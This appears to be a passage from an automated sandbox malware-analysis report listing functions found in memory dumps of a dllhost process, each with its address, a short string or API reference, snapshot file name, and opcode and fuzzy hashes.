Function 06861062 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 06861094

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d9cbb82fbb1c76d2120ea427afacd88fc75d8560f6bcd522bd95e71529c48311
Instruction ID: be3ad70ed876e9fbaf492243ac004256a0e065e1d2610e05fdcb08f2c7a9499a
Opcode Fuzzy Hash: d9cbb82fbb1c76d2120ea427afacd88fc75d8560f6bcd522bd95e71529c48311
Instruction Fuzzy Hash: 9DF081749042849FEB508F0AD989765FBE4DF04624F08C09AEE498B653D276A414CEA3

Function 04BC3E5F Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC40B8

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: d08d3a4d8742d164d1676ba9e194756ca2169dd1fa43e1a14cf114c08170904e
Instruction ID: ed937e11111e996dd518c2d7d75336e4b7b00387af728c92a8beaed18055e1c5
Opcode Fuzzy Hash: d08d3a4d8742d164d1676ba9e194756ca2169dd1fa43e1a14cf114c08170904e
Instruction Fuzzy Hash: 2E7182B83005108BFB04F778E92433E37EABB8A605F54443A994AD73A9DE755D01CB62

Function 04BC3E8C Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC40B8

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: 3e614d5babb68f3eea161e6d31ba4165e32fa114088e8705c137204fe7ae51a0
Instruction ID: e832ab153734415febf00ea7628f462cc6e5a5ec4c6c9fed55e996d4a675e5dc
Opcode Fuzzy Hash: 3e614d5babb68f3eea161e6d31ba4165e32fa114088e8705c137204fe7ae51a0
Instruction Fuzzy Hash: 4B7192B83005108BFB04F778E92433E37EABF8A605F54443A994AD73A9DEB55C01CB62

Function 04BC3EAD Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC40B8

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: 09b42d71a46b670054a7451cdb0b1a5c5625d7e20657ea5fa54c52f53e0f8f3f
Instruction ID: ed2be5b3c38a26c2be7571b87755436ace3d8743966f587962a7f24850ff3ef4
Opcode Fuzzy Hash: 09b42d71a46b670054a7451cdb0b1a5c5625d7e20657ea5fa54c52f53e0f8f3f
Instruction Fuzzy Hash: 247182B83005108BFB44F778E92433E37EABF8A605F54443A994AD73A9DEB55D01CB62

Function 04BC07C7 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

2, xrefs: 04BC07FD

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 9e1661e6557e5bdc5fca728926d21d7d60680a0e454e7cc90fa9086e7a740426
Instruction ID: f9a9d53332869de3c672c28f49558e0c6f8af54ee48df894744382842889261d
Opcode Fuzzy Hash: 9e1661e6557e5bdc5fca728926d21d7d60680a0e454e7cc90fa9086e7a740426
Instruction Fuzzy Hash: FE5186A2D49384DBC3017BE864DD6CEFFE4DAA6208F1E449BCD849A143F1645A1B9783

Function 04BC68D8 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC69DB

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: ff305ee393cf89b1e5f43832262c92e0b29c1520614d5fde954bdbe75c83ae48
Instruction ID: daa84506918d16d502b7b09f78e69e3ae1ef82938323604092c4cdbf945b36c5
Opcode Fuzzy Hash: ff305ee393cf89b1e5f43832262c92e0b29c1520614d5fde954bdbe75c83ae48
Instruction Fuzzy Hash: D8418075B001149BDB04DBB4D994BADB7EABF89310F15407AE906E7390EE75AC01CBA2

Function 04BC2A5D Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

L.|l, xrefs: 04BC2A5D

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: L.|l
API String ID: 0-98257146
Opcode ID: 317cd20bdd8c85e8c706715d0305e20b7b114d46cd46432f02753f3f1593925a
Instruction ID: 6be152f996883ee3f5148452acda76236e4ef089783c05250f35d243f37c1a59
Opcode Fuzzy Hash: 317cd20bdd8c85e8c706715d0305e20b7b114d46cd46432f02753f3f1593925a
Instruction Fuzzy Hash: 91318035F003218BEB189BB5D9583AD36E6BF85355F0481B9E946E73D0EE789C40C761

Function 04BC2D05 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

", xrefs: 04BC292B

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: cce72923f001abbdb31568e558d7a8524d3eda1f249960df7f0fb407063d8829
Instruction ID: b40a5dbe311d083c0c6143d1fa4aa48d3d87c73e0b1ead10a27de49c617d29d3
Opcode Fuzzy Hash: cce72923f001abbdb31568e558d7a8524d3eda1f249960df7f0fb407063d8829
Instruction Fuzzy Hash: 3D217135F403208BEB186BB5E86C36E36E2BB55751F0445B9E987E73E0EE689C01CB51

Function 04BC2AE9 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

\O|l, xrefs: 04BC2AE9

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: \O|l
API String ID: 0-483901042
Opcode ID: 81859ea4c4f3b19eebaea1afa3e63d896d3c28c70d7657b3cf2c0ff0b3f40dbd
Instruction ID: d9b4187fca01db06b825a132c72efc6eb3512f54e8345b7f0ae19fa86ebf75d5
Opcode Fuzzy Hash: 81859ea4c4f3b19eebaea1afa3e63d896d3c28c70d7657b3cf2c0ff0b3f40dbd
Instruction Fuzzy Hash: 59219534F007108BEB18ABB5986836E36E6BF95751F0485B9E947EB3E0EE749C00C752

Function 0083B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083B468

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1bd67ce80ebad7fd6edb7c819efef8a2f94c00dadeca9b6e0f4862bd5a75d61d
Instruction ID: f0601f322f1bb0bc110043cbae2847b94c6a03e6e334c436820c0485dacab1e9
Opcode Fuzzy Hash: 1bd67ce80ebad7fd6edb7c819efef8a2f94c00dadeca9b6e0f4862bd5a75d61d
Instruction Fuzzy Hash: 1D21A1B25093C05FDB028B25DC54792BFB4EF47724F0984DAED858F663D265A908CB62

Function 04BC2BF1 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

, xrefs: 04BC2995

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7ef75f5e15c816a9ff64d0c749fdce0e3c4070c4bba15ed539a8cafbee8d5d41
Instruction ID: cd55063e095ded78389c13412dac7c3cbefc70d826f4a9d18efe8f13e2b6c3e8
Opcode Fuzzy Hash: 7ef75f5e15c816a9ff64d0c749fdce0e3c4070c4bba15ed539a8cafbee8d5d41
Instruction Fuzzy Hash: 86215E34F403208BEB186BB5E85C36E36E2BB59751F0445B9D987EB3E0EE689C01CB51

Function 04BC2911 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

", xrefs: 04BC292B

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 74b2bc5f3883f1df6b2af9b5c4a8e2c7613c355c72b302d9943c148e0c7126c8
Instruction ID: bfed2e58af27639e1c3619d8899a6bb6ad90cac0ac07eaa0f3b17285a9d5529a
Opcode Fuzzy Hash: 74b2bc5f3883f1df6b2af9b5c4a8e2c7613c355c72b302d9943c148e0c7126c8
Instruction Fuzzy Hash: 0A114C34F003208BEB145BB5D85C36E36A1BB55351F0445B9D846E73E0EE689C00CB51

Function 0485A34F Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

(, xrefs: 0485A7BA

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004858000.00000040.00000800.00020000.00000000.sdmp, Offset: 04858000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4858000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 96ae79d139dd1ac68ae09e160413de5974bddbec33887e049c37ea51c97f80ee
Instruction ID: 4b312ceb828449164c698d8f9f2459946b405e86afbbda96c248d668492a3234
Opcode Fuzzy Hash: 96ae79d139dd1ac68ae09e160413de5974bddbec33887e049c37ea51c97f80ee
Instruction Fuzzy Hash: 7A218E38A05605CBEB18EFE4E98836DB7B1BF41708F108A28D809D7668EB745A04DB52

Function 0083A3C0 Relevance: 1.3, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A414

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7b73d2ee1870147ee0d8725e1d56a9f0655d5c61646839845129ef883fdd98f4
Instruction ID: 734adf3cd7dc7a9767cad065746c5456a64bd30ff0f7f70625b0a0103e2c5b74
Opcode Fuzzy Hash: 7b73d2ee1870147ee0d8725e1d56a9f0655d5c61646839845129ef883fdd98f4
Instruction Fuzzy Hash: 0311C2715093809FDB11CF15DC84B52FFA8EF46220F0884ABED898B653D275A818CBA2

Function 04BC2995 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

, xrefs: 04BC2995

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1a903ff3b0132527b13aa87df2ee30cf9de561bb52354133dfeb5d99dc6cdfb1
Instruction ID: 9fee4e658cf118daeba6785c53ebaaf38b962cafa4c2fa3f82b26811f6d5a73a
Opcode Fuzzy Hash: 1a903ff3b0132527b13aa87df2ee30cf9de561bb52354133dfeb5d99dc6cdfb1
Instruction Fuzzy Hash: 64111C35F403208BDB186BB5D85C36A36E1BB59751F0445B9D987E73E0EE689C00CB51

Function 04BC2ADB Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

$, xrefs: 04BC2ADB

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 0ae8b5c3c56619c7059eb28724efdc58ec6e45998e917b8832153e94a93f2a80
Instruction ID: bef2ef9399c818720eed34ea4c42abcd3f7974d5c7cc7f3c8ed1c0ea808c31bc
Opcode Fuzzy Hash: 0ae8b5c3c56619c7059eb28724efdc58ec6e45998e917b8832153e94a93f2a80
Instruction Fuzzy Hash: 51111835F403208BEB186BB5E85C36A36E2BB59751F0445B9E987E73E0EE689C00CB51

Function 04BC2B8A Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

#, xrefs: 04BC2B8A

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7229c3da00226f64b8dd18e8877e246e9cb72bf4d66c43daf6fd087f2279e298
Instruction ID: 03e2e5014916a1b270ab68a71f83c1b3d9d7edaada5dbd88aa592528847c23b4
Opcode Fuzzy Hash: 7229c3da00226f64b8dd18e8877e246e9cb72bf4d66c43daf6fd087f2279e298
Instruction Fuzzy Hash: EB112E35F403208BDB186BB5D85C36D36E1BB59751F4445B9D947E73E0EE689C00CB51

Function 0083B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083B468

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 80182c1517c393d310b87be086220b6506632404c3f8848c4aeadd020390ee29
Instruction ID: 2aa105556485a06a79649fae16a5423ef3bdd0a5a7e20ceb47c6f74b75452f5b
Opcode Fuzzy Hash: 80182c1517c393d310b87be086220b6506632404c3f8848c4aeadd020390ee29
Instruction Fuzzy Hash: 2601B1B19042408FEB108F15D985752FBE4EF84724F08C4AADE09CB652D375E814CAA6

Function 0083A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A414

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ccafe08f1a473c160a37f6d10d62265a0e721f8665ccf9ee64f36b032a21a7bd
Instruction ID: 559a05f6a20e5fe2042ae774bd2f09c5712ece51aa29b74b0845d2753586fcc9
Opcode Fuzzy Hash: ccafe08f1a473c160a37f6d10d62265a0e721f8665ccf9ee64f36b032a21a7bd
Instruction Fuzzy Hash: 7F01F2755042408FEB10CF16D9897A6FBE4EF84724F08C4ABDD49CF652D3B5E814CAA2

Function 04BC52A2 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC52A7

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul
API String ID: 0-1300287099
Opcode ID: 36340dedd9ed118ccd2758a8746c62335928642a7b363b7e7c91153d5b7f796b
Instruction ID: 23361c222254c97d2a816e76da2fc1be3b1ca015d571ee4026d000710e416dc1
Opcode Fuzzy Hash: 36340dedd9ed118ccd2758a8746c62335928642a7b363b7e7c91153d5b7f796b
Instruction Fuzzy Hash: 93F06DF47044105FEB04A7A8D51573E375F9BC9708F11902F5905C7798CEB54C118751

Function 048510DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0485392A

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 5c79d679cfb5955b2c28c71a4e820e077d9d1facab0ba6504f4d5a99e3607d35
Instruction ID: 2f32d8079d46b6854adcbad6f28d4c05669ec5c2104ef7cc030ed90947d8a9f2
Opcode Fuzzy Hash: 5c79d679cfb5955b2c28c71a4e820e077d9d1facab0ba6504f4d5a99e3607d35
Instruction Fuzzy Hash: 37F0C875B0C264CBE7144F6488143AC37A4AB06358F0847E6DC05DB2A1DB759D05CFD7

Function 04850372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 048556AC

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 98cb592e17e8fd615417ec778981e8313c077cca5e0fb8dbf2d555ad426cdb8f
Instruction ID: c50d0f93e97eb6a7b360fb68de2133db8c07b3b022e6639a5c0093645ac08c21
Opcode Fuzzy Hash: 98cb592e17e8fd615417ec778981e8313c077cca5e0fb8dbf2d555ad426cdb8f
Instruction Fuzzy Hash: 1EE0CDB56045A5DFF7515F18982534C37D4BB04354F1449D7DC01DB252DB791E019F47

Function 04BC010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 04BC0136

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: c84ef2e6aedbabc5c25b753b40bfd8a870c0203c4f29b2e2188140e19c2827e2
Instruction ID: 9983ae9ea25c058dbda2a6f43d9a596c6f0ac9be841b4e77f61b478f5904b572
Opcode Fuzzy Hash: c84ef2e6aedbabc5c25b753b40bfd8a870c0203c4f29b2e2188140e19c2827e2
Instruction Fuzzy Hash: C0E08674E05205CFEB04FFF4D58429DB7B2FF41344F508859E506D7214EB3899148A06

Function 04BC0295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 04BC02C3

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7bc8dc4e8deea348953c46f02a6ab6a732d96961ad64080fb67af77f9fd2a72a
Instruction ID: 1db91531b81179db6ebd12bbbb49edb4db2d6d9f7551c246962bb91e0d85ac75
Opcode Fuzzy Hash: 7bc8dc4e8deea348953c46f02a6ab6a732d96961ad64080fb67af77f9fd2a72a
Instruction Fuzzy Hash: CDE08670E05248CBEF04EFE9D58429DB7F2FF45304F50886AD506D7254EB7859048F02

Function 04BC09AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 04BC09C6

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 2f6804dd6a2f9e4b18e851d7b3d6963ec54705d723d5077aac15e5570391061c
Instruction ID: adf640fec32f97e8d9d90a13c70904c417fc0410ba48850a35d8a705d6d84227
Opcode Fuzzy Hash: 2f6804dd6a2f9e4b18e851d7b3d6963ec54705d723d5077aac15e5570391061c
Instruction Fuzzy Hash: 74E04638A05249CBEF40AFE4D99829EB7A1EB05304F50485AEA02DB250EA785A548A06

Function 04BC0639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 04BC065E

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 97bb0ec13a6e465a4d7d59e5acea1eec3d95a83e815b3302e6015b0bdcd57558
Instruction ID: 034efce2e53d05043f2b092b7c6b3927cc2fead4501b43adaae9c26cb9758e9e
Opcode Fuzzy Hash: 97bb0ec13a6e465a4d7d59e5acea1eec3d95a83e815b3302e6015b0bdcd57558
Instruction Fuzzy Hash: 76D0A73490B28A8FDB01DBB4841929C7FF0AF07210F9045D68496DB2B3EE38581DD701

Function 04BC037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 04BC03A3

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 76b848e2d20682f8ecff628dd389c01b281f02b6e2fe8a71d940773066e1e1a8
Instruction ID: d81df19cf458ceb36a8793215396e5a1ca524fe16cc274a3200667a013b87ad4
Opcode Fuzzy Hash: 76b848e2d20682f8ecff628dd389c01b281f02b6e2fe8a71d940773066e1e1a8
Instruction Fuzzy Hash: 81D0A734A05385CBD7415BA0892538C7BE19F01240F84855AC086DB351DE7908194B41

Function 04BC0222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 04BC0237

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: c70f3bb378b5d375148b9d2441caa95bcbe2e1883460015519bc66377d2989ba
Instruction ID: 050c46a74a0a60037a0271388f8ed861af0ba2e25c83d14bb0ace58972f3c5bf
Opcode Fuzzy Hash: c70f3bb378b5d375148b9d2441caa95bcbe2e1883460015519bc66377d2989ba
Instruction Fuzzy Hash: 13D0C734A06248CBDF44EFD4D1941DD77F2EB45300F50485AD106D7355DA385D549B41

Function 04BC08B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 04BC08D0

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: d67299797e1dc0743a1e49dc67677b583a28fd77b03c9db6437158aa09d8e5ce
Instruction ID: 7970876c57cf5a3caaf6e47354cf8d1581c1a895fb085f681cdf5a9dbe2ebcfe
Opcode Fuzzy Hash: d67299797e1dc0743a1e49dc67677b583a28fd77b03c9db6437158aa09d8e5ce
Instruction Fuzzy Hash: 62C08C70A01104CBEB80AFE0881839C76B1AB00300F808459400AE7390EE7809008F11

Function 04BC08DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 04BC08F4

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 3ee37a9e9359a8af013d3b62078d0ebafc8f1d4dffd8e185552c97eeff937a29
Instruction ID: de0ac2c1d83b7a431c3da179ffa14a600310e626b73d6e1fd8ebd295671154ff
Opcode Fuzzy Hash: 3ee37a9e9359a8af013d3b62078d0ebafc8f1d4dffd8e185552c97eeff937a29
Instruction Fuzzy Hash: BDC04C74A06144CBEB84AFF4851879C76A5AB45304F90445D950AA6395EA781A048B45

Function 04BC04C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 04BC04DE

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: a8a94fa5d888175876918ff452c12cc876931add79711252fde20c32852adb8e
Instruction ID: af3fbfad22941cdc1ca3a56e48221f5d6a61716e62d0849615f8f7e573ba7474
Opcode Fuzzy Hash: a8a94fa5d888175876918ff452c12cc876931add79711252fde20c32852adb8e
Instruction Fuzzy Hash: 4DC04C74A05244CBEB44AFE4851829D76A5AB45345F8084199506EB394EA781504CF41

Function 04BC0436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 04BC044E

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 6abb61e3193cb5f368672836b58b728b554a277ff10f3f20b0eaaf418326d814
Instruction ID: 1c2250fd2f9b1b3f0a4eae7f28d38bce415b303b8b500bdd8f189c636829351b
Opcode Fuzzy Hash: 6abb61e3193cb5f368672836b58b728b554a277ff10f3f20b0eaaf418326d814
Instruction Fuzzy Hash: A8C04C74F05248CBEB44AFF4852839C76E5AB45305F80455D940AAA395EA7919048F51

Function 04BC0415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 04BC042A

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: fc3b76119a9c9d0399acd5eb0544569aa5934f4ef213d330477195db104e2e3c
Instruction ID: 90e7ed6ec4bf410cdec49335a86260f52249c3265d4af76c1411857356740ac8
Opcode Fuzzy Hash: fc3b76119a9c9d0399acd5eb0544569aa5934f4ef213d330477195db104e2e3c
Instruction Fuzzy Hash: F5C04C74E05244CBEB54AFF4852869CB6A1AB45305F90841D9516A7395EA7814048F41

Function 04BC0500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 04BC0515

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 2c58013ccfb200b41daf9a1edc6078871001e1e5e21a67e0cf7e90d946539e78
